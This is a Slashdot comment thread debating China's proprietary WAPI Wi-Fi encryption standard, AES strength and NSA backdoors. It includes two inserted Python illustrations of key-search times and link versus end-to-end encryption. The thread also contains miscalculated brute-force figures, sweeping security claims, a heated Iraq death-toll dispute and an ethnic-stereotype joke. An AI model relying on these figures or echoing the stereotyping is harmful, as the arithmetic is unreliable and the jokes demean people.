      The general consensus is that the NSA is pretty much on-par with the commercial and academic community. They may be slightly ahead, but they certainly aren't years ahead, as used to be the case.
      --
      Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
    12. Re:Not so fast Sherlock... by Eivind · · Score: 1
      Unless of course the backdoor was mathematically proven to be only usable by knowing some secret key used while generating the backdoor.

      In other words, it could be that encrypting with AES and one secret key in reality is equivalent to encrypting with two different secret keys, one of which NSA holds.

      I agree this is mindbogglingly unlikely.

    13. Re:Not so fast Sherlock... by Anonymous Coward · · Score: 0

      If you're going to attack Lenovo's quality control and security risks with no citations, evidence, or even reasons, at least spell their name right.

    14. Re:Not so fast Sherlock... by Kadin2048 · · Score: 1

      I don't think Mr. Goatse is a standard, by anyone's definition.

      Or at least if he's the standard somewhere, I hope to God I never go there.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    15. Re:Not so fast Sherlock... by Schraegstrichpunkt · · Score: 1

      Replace "cryptography" with "cryptanalysis", and your post will make sense.

    16. Re:Not so fast Sherlock... by bigmouth_strikes · · Score: 1

      Fair enough, a party (country) could be effectively "submarining" an easily cracked technology/method into a standard. But to be useful as a backdoor it had to stay 100% a secret or else it would be meaningless for said party - they have to be sure that it wouldn't be used against themselves. Seeing that as practically impossible, I still consider an open standard to be without backdoors; known or later discovered flaws would be just that - flaws, not backdoors.

      --
      Oh, I can't help quoting you because everything that you said rings true
    17. Re:Not so fast Sherlock... by Watson+Ladd · · Score: 1

      AES has a simple algebraic structure that makes breaking it a simultaneous quadratic equation problem. In NP, but pretty close to getting done efficiently. That they should have seen and changed.

      --
      Inventions have long since reached their limit, and I see no hope for further development.-- Frontinus, 1st cent. AD
  15. Winner! by Anonymous Coward · · Score: 0
    WAP WIP WOP WUP fuckee doo

    Any crypto standard with a name like that gets my vote.

  16. Re:openssl? by deevnil · · Score: 1

    Everybody wants to use /their/ secret, of course. If it can't have code that all parties can audit.... ? I mean for real. OpenWhatever then, or is it just play-encryption.

  17. Hypocracy by tomstdenis · · Score: 3, Insightful

    We're all upset that the Chinese want to introduce their closed-door proprietary standard...

    But please, tell me, how many cryptographers were consulted BEFORE the design of WEP? I know of a few who worked on the implementation AFTER the design [e.g. when they couldn't change things]. WEP and WAP [and WiMAX and ...] are all essentially closed door standards. Even if you're in the SIG you're only one of many. And the many are usually NOT cryptographers so they'll basically vote for whatever turns into the least amount of VB.NET code for their Windows only drivers.

    Like it's so fucking hard to get a shared-secret lossy communication medium secured... AES + CCM + proper rekeying == router that doesn't cost 69.95$ at Fry's but does == a wifi device you can trust.

    Tom

    --
    Someday, I'll have a real sig.
    1. Re:Hypocracy by gkhan1 · · Score: 1

      You do know of this great protocol called Wi-Fi Protected Access, or WPA, don't you? You refer to something called WAP which I can only assume you mean to be the Wireless Application Protocol that cellphones use. Anyway, WPA is secure. It really is. Use a good password (25+ characters with some numbers and %"#&-characters) and there is not a force in the universe that can crack your password.

    2. Re:Hypocracy by Anonymous Coward · · Score: 0

      Since when is there Vb.Net code in drivers!?

    3. Re:Hypocracy by tomstdenis · · Score: 1

      Only explanation why a printer driver could be more than 10MB in size :-)

      Driver writers are usually the lowest of the low in terms of programming ability.

      Tom

      --
      Someday, I'll have a real sig.
    4. Re:Hypocracy by mrchaotica · · Score: 2, Informative

      No, the reason why printer drivers (in particular) are so big is that they have to recognize and refuse to print money, and put in traceable watermarks and stuff.

      --

      "[Regarding the 'cloud,'] ownership was what made America different than Russia." -- Woz

    5. Re:Hypocracy by theelectron · · Score: 1

      Except the mainframes the NSA own...

    6. Re:Hypocracy by Anonymous Coward · · Score: 0

      Are you sure?
      I would think the firmware handles that, especially the watermarking part.

    7. Re:Hypocracy by Daedala · · Score: 1

      I think that there is a difference between hypocrisy and not repeating your mistakes.

      --
      What I say does not represent the views of my employers, my friends, my cats, or myself.
    8. Re:Hypocracy by gkhan1 · · Score: 1

      Emm, no, they couldn't. Even if the NSA had double the computing power of the rest of the world, it would still take them millions of years to crack modern ciphers. So no, it ain't possible.

    9. Re:Hypocracy by gkhan1 · · Score: 1

      That won't be NEAR enough, you'd need a couple of thousands of those to get the speed to under a millennium. Look, modern cryptography is MINDBLOWINGLY STRONG. Stronger than you can ever imagine.

    10. Re:Hypocracy by gkhan1 · · Score: 1
      You know what, I'm getting sick of clueless people saying "Well, the supercomputers at the NSA could crack it!" I'll run some numbers for you:

      A couple of years ago we found out that if one was inclined to spend a few dozen million dollars, one could build a machine that could crack DES in 7 hours. Let's take that machine and hype it up to overdrive: let's assume that we could solve a DES cipher in one femtosecond (that is one quadrillionth of a second or 10^-15 or 0.000000000000001 seconds). This is far, far faster than the combined speed of all computers in the world (and I mean FAR FAR faster, you'd need like all the atoms in the solar system to build that computer). How long would it take that computer to crack an AES cipher?

      Well, let's see: DES has a 56 bit key, AES has a 256 bit key. Let's assume that it takes equal amounts to try a key on both ciphers (which it almost does, I think AES is about 2 times faster, but that won't matter much so it's a reasonable simplification). That would mean that it would take (10^-15)*2^(256-56) femtoseconds to solve. How much is that? Well we can easily convert it to years: (10^15*2^200)/(femtoseconds in a second * seconds in an hour * hour in a day * day in a year)= (10^-15*2^200)/(10^15 * 3600 * 24 * 365) = 50955671114250072156962 years.

      I'll say it again: Using impossible supercomputer-power that is unimaginably fast, it would take 50955671114250072156962 years to crack a standard, run of the mill, WPA2 connection with any old router (assuming you selected a good password.) Which is reassuring since the universe is only about 13700000000 years old.

      Can you promise me that you will never again utter those mindblowingly stupid comments that say "Of course the NSA can crack modern ciphers!" Can you reassure me that, or will you simply ignore this message and pretend you never saw it?
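
      The estimate above, carried through with exact arithmetic, plus the "good password" condition it depends on, as an added example that is not part of the original comment. It keeps the comment's assumptions (one full 2^56 DES key sweep per femtosecond, equal cost per key trial, 365-day years) and uses the 802.11i passphrase-to-key mapping (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt); the function names and the 10^6 passphrase guesses per second rate are assumptions.

```python
import hashlib
import math
from fractions import Fraction

SECONDS_PER_YEAR = 365 * 24 * 3600

# The comment's hypothetical machine: the whole 2^56 DES keyspace in one
# femtosecond, with an AES key trial costing the same as a DES key trial.
HYPOTHETICAL_TRIALS_PER_SECOND = 2**56 * 10**15

# Assumed rate for passphrase guessing. Each guess costs a full PBKDF2 run,
# so it is far slower than a single cipher trial on the same hardware.
ASSUMED_PASSPHRASE_GUESSES_PER_SECOND = 10**6


def sweep_years(candidates, trials_per_second):
    """Exact number of years needed to try every candidate once."""
    return Fraction(candidates, trials_per_second * SECONDS_PER_YEAR)


def wpa_psk(passphrase, ssid):
    """Derive the 256-bit WPA/WPA2-Personal key from a passphrase.

    The key is a deterministic function of (passphrase, SSID), so it is
    never harder to find than the passphrase that produced it.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    if any(not 32 <= ord(ch) <= 126 for ch in passphrase):
        raise ValueError("passphrase must be printable ASCII")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid_bytes, 4096, 32)


def effective_key_bits(length, alphabet_size):
    """Bits of work to search uniformly random passphrases, capped at 256."""
    return min(256.0, length * math.log2(alphabet_size))


def summary():
    """Search times for the key itself and for two passphrase policies."""
    return {
        "aes256_key_on_hypothetical_machine_years": float(
            sweep_years(2**256, HYPOTHETICAL_TRIALS_PER_SECOND)),
        "8_lowercase_letters_years": float(
            sweep_years(26**8, ASSUMED_PASSPHRASE_GUESSES_PER_SECOND)),
        "25_printable_ascii_years": float(
            sweep_years(95**25, ASSUMED_PASSPHRASE_GUESSES_PER_SECOND)),
        "8_lowercase_letters_bits": effective_key_bits(8, 26),
        "25_printable_ascii_bits": effective_key_bits(25, 95),
    }


if __name__ == "__main__":
    for label, value in summary().items():
        print(f"{label}: {value:.4g}")
    # Constructed sample network name and passphrase.
    print(wpa_psk("correct horse battery", "example-net").hex())
```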

  18. This "standard" is fucking ridiculous by WhiteWolf666 · · Score: 5, Insightful

    You have to partner with a bloody Chinese company to build equipment based on it.

    That's fucking ridiculous.

    The standard is unpublished, and will not be published. It checks in security keys with a centralized Chinese government server.

    I cannot imagine a world that would permit this to become an international standard, and if China insists on all equipment manufactured within its borders to have this technology it'll just push electronics manufacturing out of China.

    For a long time, people have predicted that the heavy hand of the Chinese government will one day disrupt the economic boom happening there. I hope to god not; an unstable, economically volatile China sounds like a nightmare to me.

    --
    WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    1. Re:This "standard" is fucking ridiculous by bombadier_beetle · · Score: 1

      The standard is unpublished, and will not be published. It checks in security keys with a centralized Chinese government server.

      I'm inclined to believe you, and I'm not "calling you out" or anything, but I've never heard that WAPI phones home, and none of the links I've read in this thread mention that. Do you have a source for that?

      --

      If you mod me down, I shall become more powerful than you can possibly imagine.
    2. Re:This "standard" is fucking ridiculous by bombadier_beetle · · Score: 1

      Never mind, it was right there on the Wikipedia page for WAPI. Scary.

      --

      If you mod me down, I shall become more powerful than you can possibly imagine.
    3. Re:This "standard" is fucking ridiculous by WhiteWolf666 · · Score: 1

      To me, it's less scary than goofy.

      Why would the Chinese be dumb enough to think that the world would adopt such a standard? Do they really think that proprietary protocols that can only be manufactured by Chinese companies would be popular with non-Chinese companies?

      Are they really that arrogant?

      WAPI, in terms of international acceptance, is doomed. There are so many flaws that I can't see the ISO seriously considering it. It's a goofy "standard", and it has nothing going for it.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
  19. Sounds a lot like DPRK by amightywind · · Score: 4, Funny

    ...a lot of dirty tricks including deception, misinformation, confusion and reckless charging to lobby against WAPI.

    I think China and North Korea use the same publicist.

    --
    an ill wind that blows no good
    1. Re:Sounds a lot like DPRK by rehashed · · Score: 1

      And I think that sounds like the spin prior to the war in Iraq.

    2. Re:Sounds a lot like DPRK by amightywind · · Score: 1

      I think the Iraq war is a resounding success. An elected government is in place. The terror mastermind is dead meat. Way to go Dub!

      --
      an ill wind that blows no good
    3. Re:Sounds a lot like DPRK by Anonymous Coward · · Score: 0

      You forgot the thousands of innocents dead http://www.iraqbodycount.net/. Way to go Dub!

    4. Re:Sounds a lot like DPRK by amightywind · · Score: 1

      Have you considered the death toll under Saddam? Being President means making difficult choices (Dub), not leaving problems for the next guy (Clinton).

      --
      an ill wind that blows no good
    5. Re:Sounds a lot like DPRK by rehashed · · Score: 1

      Maybe you should look at a more reputable resource as the original poster provided. Amnesty International reports the death toll under saddam as just over 17,000. I think you will find that is LESS than those slaughtered by "friendly" forces during the illegal invasion of Iraq...

    6. Re:Sounds a lot like DPRK by dfjghsk · · Score: 1

      17,000?! What a joke.

      http://www.usaid.gov/iraq/pdf/iraq_mass_graves.pdf

      Since the Saddam Hussein regime was overthrown in May, 270 mass graves have been reported. By mid-January, 2004, the number of confirmed sites climbed to fifty-three. Some graves hold a few dozen bodies, their arms lashed together and the bullet holes in the backs of skulls testimony to their execution. Other graves go on for hundreds of meters, densely packed with thousands of bodies.

      "We've already discovered just so far the remains of 400,000 people in mass graves," said British Prime Minister Tony Blair on November 20 in London. The United Nations, the U.S. State Department, Amnesty International, and Human Rights Watch (HRW) all estimate that Saddam Hussein's regime murdered hundreds of thousands of innocent people. Human Rights Watch estimates that as many as 290,000 Iraqis have been disappeared by the Iraqi government over the past two decades, said the group in a statement in May. Many of these disappeared are those whose remains are now being unearthed in mass graves all over Iraq. If these numbers prove accurate, they represent a crime against humanity surpassed only by the Rwandan genocide of 1994, Pol Pot's Cambodian killing fields in the 1970s, and the Nazi Holocaust of World War II.


      Let me repeat that in case you missed it:

      "We've already discovered just so far the remains of 400,000 people in mass graves," said British Prime Minister Tony Blair on November 20 in London.

      --
      Help me take back Slashdot. When did 'News for Nerds' become 'FUD and Conspiracy Theories for Extremist Nutjobs'?
    7. Re:Sounds a lot like DPRK by rehashed · · Score: 1

      "We found the weapons of mass destruction." said American President George W Bush on May 29.

      I wouldn't put too much weight on quotes from war-mongering politicians. The article you mention also deliberately misquotes both Amnesty International. Additionally, the figures provided by Human Rights Watch (which was actually 290,000) come from the Kurds in Northern Iraq (hardly an unbiased source), who have been at war with Iraq for over 20 years. When they sided with Iran in the decade long Iran-Iraq war, they included the death-toll for that war as a part of the calculation for genocide.
      Finally, all the United Nations did was quote the HRW figure.
      That only leaves one organisation on your list - the U.S state department - who quite frankly have their own agenda.

      If you cannot tell spin from fact, especially if the sources of your information are far from reliable, censored, and just downright misleading, you are more of a fool than you think :)

      I believe "pwned" is the correct expression

    8. Re:Sounds a lot like DPRK by Anonymous Coward · · Score: 0

      hehe... don't you realise the figure is so large so it makes you feel justified? ;)

    9. Re:Sounds a lot like DPRK by dfjghsk · · Score: 1
      The article you mention also deliberately misquotes both Amnesty International.

      Actually, it's you who deliberately misquotes AI. From AI's own website: http://www.amnesty.org/ailib/aireport/ar98/mde14.htm

      ... an estimated 100,000 Kurdish civilians who "disappeared" in 1988 in the so-called "Operation Anfal"; ...

      In October Amnesty International published a report, Iraq: "Disappearances" _ unresolved cases since the early 1980s, in which it appealed to the government to put an end to "disappearances" and to clarify the fate of hundreds of thousands of people who had "disappeared" since the early 1980s.


      I'm going to believe HRW, AI, UN, and US State Dept (who all more-or-less agree on their estimates), than a troll on /. who can't even quote AI correctly.
      --
      Help me take back Slashdot. When did 'News for Nerds' become 'FUD and Conspiracy Theories for Extremist Nutjobs'?
    10. Re:Sounds a lot like DPRK by Anonymous Coward · · Score: 0

      As already stated, the only reason they "agree" on their estimates is because they all come from one source - the Kurds.
      At the end of the day, the article you quoted is out of context - try reading the actual report instead. I think you will find the quote is accurate.

      No one would deny that huge numbers of people have died in Iraq in the last two decades. The Iran-Iraq war claimed hundreds of thousands of lives. Huge numbers were killed by the Americans in the first Gulf War, and their bodies were sometimes bulldozed into mass graves. Amnesty International reckons that Saddam executed a few hundred people a year. If true, it is an appalling level of violence - so why exaggerate it? It is, incidentally, far lower than the rate at which we have killed Iraqi civilians in the war on Saddam.

      If you want to swallow whatever your government feeds you, then feel free.
      It amuses me how narrow minded and uneducated you are :)

    11. Re:Sounds a lot like DPRK by dfjghsk · · Score: 1

      wow.. you are really something. You say I misquoted Amnesty International. So I post exactly what they say on their own website from their own reports. Yet you still say Amnesty International is saying something else.

      You clearly believe whatever you want... evidence has nothing to do with it. You could at least say so, instead of lying through your teeth and saying AI said something they didn't.

      --
      Help me take back Slashdot. When did 'News for Nerds' become 'FUD and Conspiracy Theories for Extremist Nutjobs'?
    12. Re:Sounds a lot like DPRK by rehashed · · Score: 1

      That wasn't a report - it was an article.
      Additionally, it wasn't written by Amnesty International, it just so happens to be on their website.
      Like I said - go read the referenced article.

      I love the way people get aggressive when they are blatantly wrong. Have I struck a nerve?

    13. Re:Sounds a lot like DPRK by amightywind · · Score: 1

      Help me take back Slashdot. When did 'News for Nerds' become 'FUD and Conspiracy Theories for Extremist Nutjobs'?

      I am with you. Add junk science, pacifism, and Micro$oft propaganda to this list.

      --
      an ill wind that blows no good
    14. Re:Sounds a lot like DPRK by iminplaya · · Score: 1

      Yeah, and all that during the height of American/European support. Do you actually think that our governments give a tinker's damn about how many people he killed? He killed the "right" people. They were "terrorists". And the money and weapons just kept on flowing in. Saddam only got into trouble when he stepped on the wrong toes. Same with the Taliban. So come down off your high horse and make even the feeblest effort to see the whole picture. Rumsfeld and his other supporters should be held right along side of Saddam in that court room. Otherwise the trial truly is a farce.

      --
      What?
  20. Poor diplomacy is counterproductive by mclaincausey · · Score: 4, Insightful

    If China wants to be heard in the international community, then they should participate in other global standards, or should have opened up the design and development process of WAPI to either participation or scrutiny. They developed the standard knowing that there was an international effort (NOT American) to come up with the next generation of WLAN encryption, so I have no sympathy for the wasted effort at this stage. If China wants to effectively participate in the global standards game, they should, for instance, start a Common Criteria scheme and become a signatory country. It seems to this casual observer that China often likes to go it alone wrt standards, and when they suddenly start blustering about this international community not subscribing to their arbitrary standard is ridiculous. Why should the IEEE's efforts be thrown out? They lost the vote. They can complain about the vote being rigged or unfair, but a voting system is the closest approximation to a fair way of determining next-gen standards. I hear voting isn't so popular over in China though.

    --
    (%i1) factor(777353);
    (%o1) 777353
    1. Re:Poor diplomacy is counterproductive by crawling_chaos · · Score: 1
      Perhaps it is because in the developed world our "ideal" standard is something developed by consensus, whereas in China the "ideal" standard is to do what the government tells you and shut up already? That would lead to two competing styles of negotiation, one where differences are worked out, and another where, in the absence of an ability to simply arrest everyone who disagrees with you and use them for spare parts in your state run organ farms, the only option is to walk out in a huff?

      And yes, it worries me that the US is sliding more and more toward the Chinese ideal.

      --
      You can only drink 30 or 40 glasses of beer a day, no matter how rich you are.
      -- Colonel Adolphus Busch
  21. Raises interesting question by HangingChad · · Score: 3, Insightful
    What if some day the Chinese decided that they're not going to produce devices that don't meet their standards? So far it hasn't been a problem but if the government decided all Chinese factories were going to produce routers with China-Fi encryption, that's what they'd produce.

    And since they own all our manufacturing capacity, there would be little we could do about it. It would take years to tool up enough manufacturing to replace everything we depend on them to produce.

    I guess being dependent on foreign oil wasn't good enough. We had to match that folly by sending our component manufacturing overseas as well.

    --
    That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
    1. Re:Raises interesting question by iamplasma · · Score: 1

      What if some day the Chinese decided that they're not going to produce devices that don't meet their standards? So far it hasn't been a problem but if the government decided all Chinese factories were going to produce routers with China-Fi encryption, that's what they'd produce.

      And since they own all our manufacturing capacity, there would be little we could do about it. It would take years to tool up enough manufacturing to replace everything we depend on them to produce.


      Not really, what are you basing all that on? While certainly a lot is made in China, let's not pretend they're the only place in the world capable of making electronics, doubly so when wifi gear is really a tiny segment of the electronics market. After all, Taiwan is a perfect example of a country famous for its electronics industry, yet there's no way in hell they have any interest in pushing mainland China's interests.

    2. Re:Raises interesting question by dumb_jedi · · Score: 1

      People, this is just silly. Yes, China manufactures a LOT of things, and do it for a fraction of the cost in developed countries. But we're NOT talking about steel or cars or airplanes here. It's just an AP. You can set up a production line in two months, and order our ICs and PCBs from a loooong list of countries. So no, the Chinese pushing a law that requires all the equipment manufactured there to have this standard and ONLY this standard will simply scare away business. And they certainly don't want that.

    3. Re:Raises interesting question by Just+Some+Guy · · Score: 2, Interesting
      What if some day the Chinese decided that they're not going to produce devices that don't meet their standards?

      Then world governments dictate that all WAPI-enabled router imports ship with an OpenVPN installer CD, and we all go the sane route of running trusted VPN software over untrusted open Wi-Fi connections.

      --
      Dewey, what part of this looks like authorities should be involved?
    4. Re:Raises interesting question by evilviper · · Score: 1
      What if some day the Chinese decided that they're not going to produce devices that don't meet their standards?

      Then they'd lose out on the billions upon billions of dollars they're importing from the USA. Factories in Taiwan, S.Korea (and pretty much everywhere else in the world) would be brought back up to speed quickly, and be outputting wireless routers before the first non-standard Chinese routers actually hit the docks. And this is not to mention the fact that pretty much all wireless routers/APs and cards are easily firmware upgradable (including their encryption standard).

      They have a lot more to lose out of the deal than we do.
      --
      Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
    5. Re:Raises interesting question by popsicle67 · · Score: 1

      Remember, the Chinese do not have a profit motive, they have a power motive so they could just corner the market by dropping prices until the competition screams. Think of the whole world and not just us for a minute. If price is the object then the rest of the world will go to the Chinese standard in the scenario I have weaved and what will the US do? In the end there will be a few manufacturers who will license out to the Chinese just to keep in the game and the rest will just die.

    6. Re:Raises interesting question by evilviper · · Score: 1
      Remember, the Chinese do not have a profit motive, they have a power motive so they could just corner the market by dropping prices until the competition screams.

      Not true. Every laborer, manager, and owner is trying to make as much profit as they possibly can. China is NOT a socialist country.

      The government has a lot of power, but they aren't going to cripple their own economy for a tiny bit of fleeting power. And that's exactly what starting to impose such regulations would do. As soon as there's a sign of this ANYWHERE, you'll see companies pulling out of China as quickly as they possibly can.
      --
      Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
    7. Re:Raises interesting question by tbo · · Score: 1

      After all, Taiwan is a perfect example of a country famous for its electronics industry, yet there's no way in hell they have any interest in pushing mainland China's interests.

      You'd be surprised. The latest trend is for US companies to outsource manufacturing to Taiwanese companies, who in turn have moved their actual factories to mainland China (cheaper labor). Having lots of trade between Taiwan and the mainland is definitely in Taiwan's interest, as it reduces the chance of war.

  22. Why do they need a separate encryption standard by k1980pc · · Score: 3, Funny

    when Mandarin or Cantonese is equally or more effective :)

  23. It's actually very simple by rewter · · Score: 1

    It's actually very simple. Here's what they need to do in two simple steps:

    1. They should tell all manufacturers of WLAN equipment that are based in China (90% or so of all wlan manufacturers) to implement WAPI (remember, they are in China so they have to do what their government asks them to or they will be down. Oh wait, it's not very much different in USA anyway.).

    2. They should tell all manufacturers of WLAN equipment that are based in China to drop support for 802.11i, or whatever else shouldn't be there.

    Now, after about a year or so they will have a de facto wireless encryption standard named WAPI. Like it or not, that's the most efficient way to do this.

    1. Re:It's actually very simple by WhiteWolf666 · · Score: 1

      If China did that, manufacturing would shift elsewhere. It is a mistake to think that in a globalized economy we are beholden to any one supplier.

      India is the most likely candidate, but there isn't any reason we couldn't manufacture this stuff anywhere else, including the E.U. or good ole US of A.

      Price would go up, sure. But we aren't _that_ beholden to the Chinese that we would stick to an inferior technology.

      Imagine if China required all computer manufacturers to use home-built Dragon chips. All computer manufacturers would move to another country; it's really just that simple.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    2. Re:It's actually very simple by Anonymous Coward · · Score: 0

      Price would go up, sure. But we aren't _that_ beholden to the Chinese that we would stick to an inferior technology.

      That's how things are now.

    3. Re:It's actually very simple by newt0311 · · Score: 0

      Actually I don't think it would. It took several years for China's manufacturing base to get built up and the only reason they were able to do this so quickly was because of the government indirectly pushing the issue and the abundance of super cheap labor. If it takes another few years for the manufacturing bases to shift, we would have just accepted the standard by then.

  24. Re:openssl? by HRogge · · Score: 1

    It seems you have no idea what makes a good encryption standard today.

    The only way to be sure that an encryption schema is good is to publish it so that thousands of scientists can look at it and search for problems. Better try to include the community into the development process.

    Your "security by obscurity" idea almost never worked...

  25. I guess the Chinese aren't good diplomats by m874t232 · · Score: 1

    I suspect lots of companies and people would have liked to stick it to the IEEE and Linksys, and if the Chinese had prepared their position well, negotiated carefully, and put in a good proposal for an open, patent-unencumbered, well-tested, and clean encryption standard, they could have won this debate.

    I don't know what exactly they actually did, but from the strongly negative reactions, I'm concluding that they must have failed on not just one, but several of these points.

    1. Re:I guess the Chinese aren't good diplomats by WhiteWolf666 · · Score: 5, Insightful

      What they did?

      They proposed a secret standard, with a central key repository (located on Chinese government servers). Implementation of this standard was given to 12 Chinese companies, and developing any devices based on this standard requires partnering with these Chinese manufacturers.

      It isn't patent-encumbered, but that's because it's a secret, and patenting it would require releasing the details.

      There isn't any debate to win. Not only is it proprietary versus open, it's proprietary and exclusively controlled-and-licensed-and-manufactured by the Chinese government and Chinese state-owned companies.

      Everything about WAPI is wrong.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    2. Re:I guess the Chinese aren't good diplomats by bombadier_beetle · · Score: 1

      And keep in mind that "partnering" is Mandarin for "letting Chinese companies copy your technology."

      --

      If you mod me down, I shall become more powerful than you can possibly imagine.
  26. The point of WEP and its successors by Anonymous Coward · · Score: 1, Interesting

    The point of wireless encryption isn't to prevent anyone from sniffing the data. As soon as the data leaves the AP, it reverts to whatever form of traffic it was - POP, HTTP, HTTPS, FTP, whatever. The Chinese have more than enough access to intercept any network traffic in China in a centralized location; they don't have to sit outside your home sniffing wireless traffic.

    I've always thought that WEP and its like are overrated. If you want something to be secure, you need end-to-end encryption. You shouldn't be sending confidential data over _any_ part of the network, wireless or not, without a secure protocol like SSH or HTTPS. If you have end-to-end encryption, WEP becomes much less important.

    Extra crackability may not be bad, from the Chinese point of view; control freaks try to get as much power as they can, and I can see some bureaucrat pushing for this just because. Just like in the US, where we have officials who say they absolutely need some new privacy-intrusive measure even though existing measures already cover everything they could legitimately want (like warrantless wiretapping - or CALEA).
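
Added illustration, not part of the thread or of any poster's comment: the argument of comment 26 above, that link encryption ends at the access point while end-to-end encryption does not, modelled in Python. The `seal`/`unseal` cipher is a toy stand-in built from HMAC-SHA256 (it is not WEP, WAPI, CCMP or TLS), and every name, key and the sample message are constructed for this example.

```python
import hashlib
import hmac
import os


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: concatenated HMAC-SHA256(key, nonce || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def subkeys(key: bytes):
    """Derive separate encryption and MAC keys from one shared secret."""
    enc = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac = hmac.new(key, b"mac", hashlib.sha256).digest()
    return enc, mac


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC; returns nonce (12) || ciphertext || tag (32)."""
    enc, mac = subkeys(key)
    nonce = os.urandom(12)
    ct = bytes(p ^ k for p, k in zip(plaintext, keystream(enc, nonce, len(plaintext))))
    tag = hmac.new(mac, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> bytes:
    """Verify the tag, then decrypt. Raises ValueError on tampering or a wrong key."""
    if len(blob) < 44:
        raise ValueError("blob too short")
    enc, mac = subkeys(key)
    nonce, ct, tag = blob[:12], blob[12:-32], blob[-32:]
    expected = hmac.new(mac, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return bytes(c ^ k for c, k in zip(ct, keystream(enc, nonce, len(ct))))


# Constructed sample: a POP3-style login, one of the cleartext protocols the comment lists.
MESSAGE = b"USER alice\r\nPASS hunter2\r\n"
SECRET = b"hunter2"


def send(message: bytes, link_key: bytes, e2e_key: bytes = None) -> dict:
    """Model client -> AP -> server and return what each vantage point captures."""
    payload = seal(e2e_key, message) if e2e_key else message
    radio = seal(link_key, payload)      # frame as it travels over the air
    upstream = unseal(link_key, radio)   # the AP removes link encryption before forwarding
    delivered = unseal(e2e_key, upstream) if e2e_key else upstream
    return {"radio": radio, "upstream": upstream, "delivered": delivered}


def exposed(capture: bytes, secret: bytes = SECRET) -> bool:
    """True if the password is readable in the captured bytes."""
    return secret in capture


def report(link_key: bytes, e2e_key: bytes) -> dict:
    """Per scenario, which observers can read the password."""
    rows = {}
    for label, key in (("link only", None), ("link + end-to-end", e2e_key)):
        seen = send(MESSAGE, link_key, key)
        rows[label] = {
            # someone recording radio frames without any key
            "radio sniffer": exposed(seen["radio"]),
            # someone on the wired side of the AP (ISP, central tap)
            "upstream tap": exposed(seen["upstream"]),
            # anyone who holds the wireless key and decrypts a recorded frame
            "link-key holder": exposed(unseal(link_key, seen["radio"])),
        }
    return rows


if __name__ == "__main__":
    for label, row in report(os.urandom(32), os.urandom(32)).items():
        print(f"{label:18} {row}")
```
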

  27. Where's step 3? by Anonymous Coward · · Score: 0

    Where's the part about figuring out why the rest of the world doesn't beat a path to their door to buy these?

    I'm sure the rest of the Asian Pacific rim manufacturers will be laughing all the way to the bank.

  28. It's actually called.. by Anonymous Coward · · Score: 0

    ..Chi-Fi

  29. An informative article... by wkcole · · Score: 4, Informative

    EETimes did a fact-rich article in March. The first paragraph of the second page is most illuminating. It seems the "startup" that owns the secret encryption mechanism lacks any visible means of support, and it is a "spinoff" of a government body.

    IMHO there is far too much polite gentility and benefit of the doubt shown in the media, and ISO, and WTO and even /. to the thugs who run China. There's no moral or technical equivalency involved here. The Chinese government presented WAPI late accompanied by protectionist threats and has been whining disingenuously about the world mistreating it in the process ever since. WAPI has received over 2 years of special treatment because the rest of the world relies on Chinese de facto slave labor to build its electronic goods. If the ISO process was being run honestly with a legitimate goal of defining a trustworthy secure standard that can be widely implemented in interoperable and competitive ways, WAPI would have been dismissed when first proposed.

  30. Dropping the Bomb by Doc+Ruby · · Score: 2, Insightful

    Walking out on negotiations might work when you're holding the nukes or the Tibet being discussed at a diplomatic meeting. But walking out on engineering standards meetings for consumer electronics seems more like giving up. Maybe when you're a mafia government that rules by decree with an iron fist, you can't tell the difference.

    --
    make install -not war

  31. say whaaa? by stewie's+deuce · · Score: 0, Flamebait

    chinese encryption algorithm??? are you serious?? does anyone else here think its a bad idea to use an security algorithm from a group of people who have yet to invent/discover the fork??? and.. i ask that with great respect to those who actually TRIED to use chopsticks.. on second thought.... shit, throw a fortune cookie at it and see if the algorithm falls apart.. your fortune: "confusion says 'you key is bad.. you no enta hear..'"

    1. Re:say whaaa? by stewie's+deuce · · Score: 1

      flamebait??? wow.. what humorless moderators we have here.. man...

    2. Re:say whaaa? by Anonymous Coward · · Score: 0

      No. It is not funny. I'm glad the moderators gave you a kick in the pants.

  32. Dirty Secret of WAPI by Anonymous Coward · · Score: 0

    WAPI uses a centralized authentication host, known to both the computer and router. Geee, I wonder why China likes this architecture. Guess who would have easy access to all the keys.

    Of course, this also makes it an easy target for hackers. WAPI systems in general would prove juicy targets, either for DOS, or hacking.

    AES is secure, there is no NSA backdoor. Of course the NSA may have a way to brute force it, we've all heard rumors of it. But they have to bruteforce each key of each router they want to listen in on.

    The Chinese govt just has to walk up to the telecom owning the local auth host and say "Give us the keys" or "Let us listen in", and it's arbitrarily simple.

  33. paranoia is irrelevant by sepharious · · Score: 1

    No one is going to use encryption from a communist country, end of story. They can try using a homegrown solution there but as the world ties closer together over time, they'll have to adopt more open standards or face the prospects of being incompatible.

    --
    Did you know that you can be apathetic to apathy? Not that I give a shit...
    1. Re:paranoia is irrelevant by Anonymous Coward · · Score: 0

      >No one is going to use encryption from a communist country, end of story.

